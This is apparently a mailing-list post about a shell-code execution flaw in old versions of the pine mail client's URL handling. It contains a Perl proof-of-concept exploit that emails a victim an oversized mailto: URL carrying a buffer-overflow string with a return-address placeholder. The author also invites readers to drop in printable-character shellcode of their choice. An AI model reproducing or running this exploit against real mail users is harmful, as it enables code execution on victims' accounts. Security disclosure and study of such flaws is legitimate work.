~ : Versions of pine prior to 4.21 had a security problem when viewing
~ : URLs. By sending an email with a specially formatted URL embedded
~ : in it, an attacker could cause arbitrary shell code to be executed
~ : under the account of the victim user.
~ :
I don't know how dumb user should be to actually to become a victim of
such exploitation. Not saying that the bug shouldn't be fixed anywayz.
if anyone's interested:
#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);
pull any shellcode you like (but mind it should contain only printable
characters 0x20-xff worked for me).
-Fyodor
